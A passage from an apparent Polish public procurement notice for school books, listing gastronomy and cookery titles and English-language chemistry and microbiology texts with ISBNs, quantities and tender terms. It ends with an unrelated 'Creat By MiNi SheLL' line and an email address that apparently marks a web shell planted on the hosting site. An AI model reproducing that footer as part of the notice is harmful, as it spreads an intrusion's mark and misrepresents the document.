54. Górecka Danuta, Halina Milanówka, Ewa Superczyńska, Melania Żylińska-Kaczmarek, Technologia gastronomiczna z obsługą konsumenta. Cz. 2. Wyd. Format AB, Warszawa 2006 ISBN: 83-89184-16-8 - 1 sztuka
55. Grykałowska Hanna - Sałatki na każdą okazję Wydawnictwo Rea 2008,  ISBN 8371419881
- 1 sztuka
56. Lehari Gabriele - Egzotyczne owoce i warzywa w kuchni. Wydawnictwo Mulico 2007, ISBN: 9788370735067 - 1 sztuka
57. Martin Susanne - Przysmaki z kapusty kiszonej. Wydawnictwo: Mulico 2007. ISBN: 8370735074 - 1 sztuka
58. Muras Jolanta, Wielka księga: sałatki surówki. Wydawnictwo Bauer-Weltbild Media (KDC) 2010. ISBN: 9788325800819 - 1 sztuka
59. Praca zbiorowa, Sałatki polskie. Wydawnictwo Dragon 2010, ISBN: 978-83-615-8272-4 - 1 sztuka
60. Clemetns Carole, Wolf-Cohen Elizabeth - Wyśmienita kuchnia francuska, Wydawnictwo Arkady 2006. ISBN: 83-213-3890-9 - 1 sztuka
61. Dopp Willrich Rebbe - Kuchnia orientalna, Wydawnictwo: Muza 2009, ISBN: 9788374956062 - 1 sztuka
62. Ferguson Judith - Kuchnie świata. Najlepsze potrawy krok po kroku Wydawnictwo: Delta W-Z 2010, ISBN: 8371751400 - 1 sztuka
63. Fiedoruk Andrzej  - Kresowy tygiel kulinarny. Kuchnia białoruska. Wydawnictwo: Zysk i S-ka 2010, ISBN: 978-83-7506-590-9 - 1 sztuka
64. Kazuku Emi, Łatwa kuchnia japońska, Wydawnictwo Muza, 2011, ISBN: 9788374959889 - 1 sztuka
65. Luard Elisabeth - Kuchnia hiszpańska i portugalska Wydawnictwo Elipsa 2008, ISBN: 978-83-245-9546-4  -1 sztuka
66.  Łukasik Inna, Agnieszka Sado - Kuchnia Rosyjska. Wydawnictwo: Rea 2008, ISBN 9788371418600 - 1 sztuka
67. Praca zbiorowa, Podróże kulinarne. Kuchnia skandynawska. Tradycje, smaki, potrawy. Wydawnictwo: New Media Koncept 2009, ISBN: 978-83-89840-71-4 - 1 sztuka
68. Praca zbiorowa pod red. Jolanty Berndt-Kostyrzewskiej, Kuchnie różnych narodów. Wyd. Format AB 2001, ISBN: 83-86331-07-0 - 1 sztuka
69. Praca zbiorowa - Szkoła gotowania po włosku i najlepsze przepisy. Wydawnictwo: Samp 2006,  ISBN: 83-89822-34-2 - 1 sztuka
70. Praca zbiorowa - Kuchnia indyjska. Najlepsze przepisy. Wydawnictwo: Publicat SA 2010, ISBN: 9788324518241 - 1 sztuka
71. Ramsay Gordon - Kuchnie świata. Wydawnictwo: Muza 2010, ISBN 978-83-7495-853-0 - 1 sztuka
72. Miquelasquez Juan Pedro Kuchnia meksykańska. Wydawnictwo: Samo,  205, ISBN: 978-83-89822-29-1 - 1 sztuka
73. Vially Anais  - Święta na stołach świata. Wydawnictwo: Twoje Wydawnictwo 2011, ISBN: 9788376130286  - 1 sztuka
74. Whiteman Kate, Wright Jeni, Boggiano Angela - Kuchnia włoska. Wydawnictwo: Elipsa 2008, ISBN: 978-83-245-9540-2 - 1 sztuka
75. Zihua Liu, Franz Uli - Kuchnia chińska. Wydawnictwo: Muza Zihua Liu, Franz Uli - Kuchnia chińska. Wydawnictwo: Muza 2008. ISBN: 978-83-7495-430-3 - 1 sztuka
76. Barańska Joanna-Kuchnia Lucyny Ćwierczakiewiczowej- potrawy świąteczne, 2006, Videograf Edukacja, Chorzów, ISBN: 978-83-89232-89-2 - 1 sztuka
77. Cuthbert Pippa, Lindsay Cameron Wilson -Zapraszam na grilla. Wydawnictwo: Klub Dla Ciebie 2000, ISBN: 9788325800833 - 1 sztuka
78. Ferencis Georg - Gotowanie w kombiwarze i parowarze. Wydawnictwo: RM 2011, ISBN:978-83-7243-925-3 - 1 sztuka
79. Jachowska Halina - Pyry, ziemniaki, kartofle Wydawnictwo: Prószyński i S-ka 2006, ISBN: 83-7469-236-7  -1 sztuka
80. Jakimowicz-Klein Barbara - Dania z grzybami. Wydawnictwo: Świat Książki 2010, ISBN: 9788324720378 - 1 sztuka
81. Kozłowska Agnieszka, Eleonora Trojan - Zupy buliony polewki czyli potrawy jedzone łyżką Wydawnictwo: AA 2008, ISBN: 9788361060499 - 1 sztuka
82. Lizambard Martine - Naleśniki. Słodkie, słone i pikantne. Wydawnictwo: RM 2010, ISBN: 978-83-7243-819-5 - 1 sztuka
83.  Macho Britta, Tina Schlag - Kuchnia dla diabetyków,  Wydawnictwo: Read Me 2011, ISBN: 9788372439246 - 1 sztuka
84. Markuza Biruta- Zupy na każdy dzień roku. Wydawnictwo: Zysk i S-ka 2010, ISBN: 978-83-7506-470-4 - 1 sztuka
85. Markuza Biruta   - Przyprawy z całego świata. Wydawnictwo: Zysk i S-ka 2010, ISBN: 9788375064780 - 1 sztuka
86. Metz Reinhold, Hans Szameitat - Zimna kuchnia. Wydawnictwo: Rea 2007, ISBN: 9788371419317 - 1 sztuka
87. Milewska Mariola, Anna Prączko, Andrzej Stasiak, Podstawy gastronomii. Polskie Wydawnictwo Ekonomiczne, Warszawa 2010, ISBN:  978-83-208-1861-1  - 1 sztuka
88. Podstawy technologii gastronomicznej - pod red. Stanisława Zalewskiego, wydanie 4, Wydawnictwa Naukowo-Techniczne, Warszawa, 2009, ISBN: 9788320434958 - 1 sztuka
89. Pantaleoni Lucia - Przekąski i przystawki. Zimne i gorące. Wydawnictwo: RM 2011, ISBN 978-83-7243-906-2 - 1 sztuka
90. Praca zbiorowa - Pieczenie krok po kroku. Wydawnictwo: MAK, 2009, ISBN: 978-39-399-9145-8  -1 sztuka
91. Praca zbiorowa- Warzywa. Podstawy gotowania. Wydawnictwo: Klub Dla Ciebie 2010, ISBN: 978-83-2580-2-592 - 1 sztuka
92. Praca zbiorowa - Gotowanie krok po kroku. Wydawnictwo: MAK 2009, ISBN: 978-3-939991-44-1 - 1 sztuka
93. Praca zbiorowa - Przekąski. Księga Kucharska Wydawnictwo: Buchmann 2011, ISBN: 978-83-7670-144-8 - 1 sztuka
94. Praca zbiorowa - Sushi i sashimi. Wydawnictwo: RM 2010, ISBN 978-83-7243-785-3 - 1 sztuka
95. Ridgaway Dwayne - Pizze. Wydawnictwo: Muza 2006, ISBN: 9788373198487 - 1 sztuka
96. Roux Michel - Jajka. Wydawnictwo Bellona 2008, ISBN: 9788311108288 - 1 sztuka
97. Schinharl Cornelia - Kuchnia wegetariańska. Wydawnictwo: Świat Książki 2011, ISBN: 9788324722808 - 1 sztuka
98. Staffieri Claudia Adriana  - Ryż. Wydawnictwo: Świat Książki 2011, ISBN: 978-83-247-2016-3 - 1 sztuka
99. Stauffer Clyde E. - Emulgatory. Wydawnictwa Naukowo-Techniczne 2001, ISBN:83-204-2661-8- 1 sztuka
100. Stawska Adrianna Ewa, Paweł Loroch - Atlas kanapek świata. Wydawnictwo: G+J RBA 2010, ISBN: 9788375960891 - 1 sztuka
101. Szymanderska Hanna, Makarony, pierogi i naleśniki oraz inne dania z mąki, kaszy i ryżu. Wydawnictwo: Mulico 2010,  ISBN: 9788370738662 - 1 sztuka
102. Szymanderska Hanna - Zupy klasyczne przecierane owocowe na zimno i na gorąco Wydawnictwo: Mulico 2010, ISBN: 978-83-7073-864-8 - 1 sztuka
103. Szymanderska Hanna - Grzyby duszone, smażone, pieczone i wiele innych. Wydawnictwo: Mulico 2011,  ISBN 978-83-7073-868-6 - 1 sztuka
104. Teggemann Anna K. - Warzywa. Kuchnia na co dzień i od święta. Wydawnictwo: Mulico 2010, ISBN: 978-83-7073-821-1 - 1 sztuka
105. Trojan Eleonora - Grill. Domowy wyrób. Wydawnictwo: AA 2009, ISBN: 978-83-610-6082-6 - 1 sztuka
106. Wieczorek-Chełmińska Zofia  - Dietetyczna kuchnia wegetariańska. Wydawnictwo Lekarskie: PZWL 2009, ISBN: 9788320037142 - 1 sztuka
107. Ewa Czarniecka-Skubina, Obsługa konsumenta w gastronomii i cateringu. Wydawnictwo SGGW, 2008, ISBN 978-83-7244-937-5 - 1 sztuka
108. Jargoń Ryszard, Obsługa konsumenta. Cz. 1. WSiP, Warszawa 2008, ISBN:  978-83-02-07844-6  - 1 sztuka
109. Mikuta Beata, Technologia gastronomiczna z obsługą konsumenta (cz. 1. Obsługa konsumenta). Wyd. Format AB, 1998, ISBN:  83-86331-36-4 - 1 sztuka
110. Szajna Renata, Danuta Ławniczak, Alina Ziaja, Obsługa gości (konsumentów). Cz. 2. Wyd. REA, Warszawa 2009, ISBN:  978-83-7544-004-1  -1 sztuka
111. Szajna Renata, Danuta Ławniczak, Alina Ziaja, Obsługa gości (konsumentów). Cz. 1. Wyd. REA, Warszawa 2009, ISBN:9788371418044 - 1 sztuka
112. Darbonne C., Girard S. Kawy świata. Wyd. Twój Styl, 2005, ISBN: 83-7163-457-9 - 1 sztuka
113. Fiedoruk A. Kawa bez tajemnic. Wyd. Kreator 2004, ISBN: 9788373440098 - 1 sztuka
114. Pickford Louise  - Gorące napoje. Wydawnictwo: RM 2009, ISBN 978-83-723-787-7 - 1 sztuka
115. Woźny Sara Magdalena  - Tajemnice kawy. Wydawnictwo: Zysk i S-ka 2011, ISBN: 978-83-7506-537-4 - 1 sztuka
116. Wojtowicz Anna, Kawowe przysmaki. Wyd. Astrum, 2005, ISBN: 8372772045 - 1 sztuka
117. Thorn J. Kawa. Przewodnik po światowych markach kawy. Wyd. MWK, 2008, ISBN: 9788361065197  -1 sztuka
118. Thorn Jon - Kawa. Zostań koneserem Wydawnictwo: MWK 2008, ISBN: 9788361065197 - 1 sztuka
119. Russak Grzegorz, Praktyczna kuchnia myśliwska, Łowiec Polski 2003, ISBN: 8371633890 - 1 sztuka
120. Russak Grzegorz, Dziczyzna na co dzień i na święta, Łowiec Polski 2008, ISBN: , 83-89223-33-3 - 1 sztuka
121. Szymanderska H., Drób czyli najsmaczniejsze potrawy z kurczaka indyka gęsi i kaczki. Wydawnictwo: Mulico 2011, ISBN: 9788370738716 - 1 sztuka
122. Ridder Anne - Wieprzowina. Kuchnia na co dzień i od święta. Wydawnictwo: Mulico 2010, ISBN: 978-83-7073-822-8 - 1 sztuka
123. Szymanderska Hanna , Polska kuchnia myśliwska. Wydawnictwo: Muza 2008, ISBN: 9788374955973 -  1 sztuka
124. Szymanderska Hanna - Dziczyzna - najlepsze dania z zająca, dzika, sarny, jelenia, daniela i dzikiego ptactwa. Wydawnictwo: Mulico 2011, ISBN: 9788370738723 - 1 sztuka
125. Szymanderska Hanna - Mięso czyli dania z wołowiny cielęciny wieprzowiny baraniny i królika. Wydawnictwo: Mulico 2011, ISBN: 978-83-7073-870-9 - 1 szuka
126. Zuzek Wiesław - Wyborne pasztety i paszteciki. Domowy wyrób. Wydawnictwo: AA 2009, ISBN: 978-83-610-6038-3 - 1 sztuka
127. Aldo Zilli - Ryby na różne sposoby. Wydawnictwo: Muza 2006, ISBN: 9788374950275 - 1 sztuka
128. Szymanderska Hanna - Ryby, owoce morza i ślimaki - sprawdzone przepisy. Wydawnictwo: Mulico 2011, ISBN: 9788370738693 - 1 sztuka
129. Bockenheim Krystyna, Przy polskim stole, wydawnictwo Dolnośląskie, 1999, ISBN: 83-7023-661-8 - 1 sztuka
130. Ćwierczakiewiczowa Lucyna - Jedyne praktyczne przepisy. Wydawnictwo: Nowy Świat 2009,  ISBN: 978-83-7386-367-5 - 1 sztuka
131. Ćwierczakiewiczowa Lucyna,  365 obiadów, Wydawnictwo Nowy Świat 2009, ISBN: 978-83-7386-366-8 - 1 sztuka
132.  Hańska Magdalena - Kuchnie regionalne. Mazury. Wydawnictwo: Klub Dla Ciebie 2010, ISBN: 978-83-258-0355-1 - 1 sztuka
133. Czerniecki Stanisław - Compendium Ferculorum albo Zebranie Potraw, wydanie i opracowanie Jarosław Dumanowski i Magdalena Spychaj, z przedmową Stanisława Lubomirskiego, Muzeum Pałac w Wilanowie, 2010, ISBN: 978-83-60959-97-8 - 1 sztuka
134. Felipe Fernandez-Armesto - Wokół tysiąca stołów czyli historia jedzenia, Wydawnictwo Twój Styl, 2003, ISBN: 83-7163-310-6 - 1 sztuka
135. Hydzik-Żmuda Marta - Specjały kuchni polskiej. Wydawnictwo: AD Oculos 2009, ISBN: 978-83-7613-017-0 - 1 sztuka
136. Skriabin Agnieszka, Tradycyjne potrawy świąteczne. Wielkanoc. Wydawnictwo: Bauer-Weltbild Media 2011, EAN: 9788325803780 - 1 sztuka
137. Smak Mazur - Kuchnia dawnych Prus Wschodnich, Wydawnictwo Baobab Retman, 2006, ISBN: 83-910523-4-6 - 1 sztuka
138. Szymanderska Hanna - Polska kuchnia tradycyjna. Wydawnictwo: Świat Książki - 1 sztuka
139. Wielądko Wojciech - Kucharz doskonały, Wydawca Graf_ika, 2009, ISBN:  978-83-61889-16-8 - 1 sztuka
140. Trojan Eleonora - Tradycyjna kuchnia postna. Wydawnictwo: AA 2009, ISBN: 978-83-610-6070-3 - 1 sztuka
141. Tobias Pehle, Czekolada. Leksykon. Składniki, podawanie, przepisy. Firma Księgarska Jacek Olesiejuk 2009, ISBN: 9788376260662  -1 sztuka
142. Coady Chantal - Czekolada. Zostań koneserem. Wydawnictwo MWK 2008, ISBN: 9788361065180  -1 sztuka
143. Jargoń R, Obsługa konsumenta (cz. 2). WSiP, Warszawa 2000, ISBN: 83-02-07845-X - 1 sztuka
144. Nowicki Z.T. Nowe vademecum barmana. Wyd. Galion, Gdynia 2000, ISBN: 8390932946 - 1 sztuka
145. Kozłecka Barbara, Krystyna Osowska , Przedsiębiorstwo gastronomiczne, Wydawnictwo Difin (luty  2012), ISBN: 978-83-7641-445-4 - 1 sztuka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pomoce dydaktyczne - literatura obcojęzyczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Analytical Chemistry and Quantitative Analysis, David S. Hage, James R. Carr 2010. Wydawnictwo: Prentice Hall; 1 edition (February 19, 2010) ISBN-10: 0321596943 ISBN-13: 978-0321596949 - 1 sztuka
2. Chemical Analysis in the Laboratory,  Baker R., Royal Society of Chemistry, 2002 Wydawca Royal Society of Chemistry ISBN 0-85404-646-1 - 1 sztuka
3. HPLC Methods For Pharmaceutical Analysis, George Lunn, Norman R. Schmuff  John Wiley and Sons, 2000. Wydawca Lunn, George C 2000 John Wiley and Sons  ISBN: 978-0-471-18176-7  -1 sztuka
4. Hazardous Materials Characterization: Evaluation Methods, Procedures, and Considerations, Donald A. Shafer, 2006. Wydawca John Wiley and Sons, 2006 ISBN 0471462578, 9780471462576 - 1 sztuka
5.  Environmental Analytical Chemistry, Fifield F. W., Haines P. J. Blackwell Science, 2000. Wydawca Wiley-Blackwell, 2000 ISBN 0632053836, 9780632053834 - 1 sztuka
6.  Trace Elements in Soils, editor Peter S. Hooda, 2010 Wydawnictwo Wiley-Blackwell, 2000 ISBN 1405160373, 9781405160377 - 1 sztuka
7. Heavy Metal Compounds in Soil: Transformation upon Soil Pollution and Ecological Significance, Tatiana M. Minkina, Galina V. Motusova, Olga G. Nazarenko, Saglara S. Mandzhieva, 2010 Wydawca Nova Science Pub Inc, 2010 ISBN 1608764664, 9781608764662 - 1 sztuka
8.  Handbook of basic tables for chemical analysis, 2011 Wydawnictwo  CRC Press ISBN-10: 1420080423 ISBN-13: 978-1420080421 - 1 sztuka
9. Environmental Chemistry, Colin Baird, Michael Cann, 2008Wydawca W. H. Freeman;
ISBN-10: 0716748770 ISBN-13: 978-0716748779 - 1 sztuka
10. Environmental Organic Chemistry, Rene P. Schwarzenbach Philip M. Gschwend, Dieter M. Imboden, 2002, Wydawca John Wiley and Sons, 2003, ISBN 0471357502, 9780471357506 - 1 sztuka
11. Environmental Chemistry Solutions Manual, Colin Baird, Michael Cann, 2008, Wydawca W.H. Freeman and Co. ISBN 1429210052, 9781429210058 - 1 sztuka
12. Chemistry of the Environment (2nd Edition), Thomas G. Spiro, William M. Stigliani, 2002 Wydawca Prentice Hall; 2 edition (March 29, 2002) ISBN-10: 0137548966  ISBN-13: 978-0137548965 - 1 sztuka
13. Metagenomics: Methods and Protocols. Wolfgang R. Streit, Rolf Daniel [autorzy]. Methods in Molecular Biology. 2010 Wydawnictwo Humana Press.  ISBN: 1607618222, 259 stron - 1 sztuka
14. Molecular Genetics of Bacteria. Snyder L., Champness W. [autorzy].  2007 Wydawca ASM Press 3  ISBN-10: 1555813992, 735 stron. - 1 sztuka
15. Industrial Microbiology: An Introduction. Waites M.J., Morgan N.L., Rockey J.S., Higton G. [autorzy] 2001 Wydawca Wiley-Blackwell,  ISBN-10: 0632053070, 304 strony - 1 sztuka
16. Molecular Biotechnology: Principles and Applications of Recombinant DNA. Glick B.R., Pasternak J.J., Patten C.L. [autorzy]. Wydawca American Society for Microbiology IS   ISBN-10: 1555814980, 1000 stron - 1 sztuka
17. Genomy  T.A. Brown, wydanie 3. wydawnictwo PWN  ISBN: 978-83-01-15634-3 - 10 sztuk
18. Chemia dla biologów. Krótkie wykłady  J. Fisher, J.R.P. Arnold wydawnictwo PWN  ISBN: 978-83-01-15368-7 - 10 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com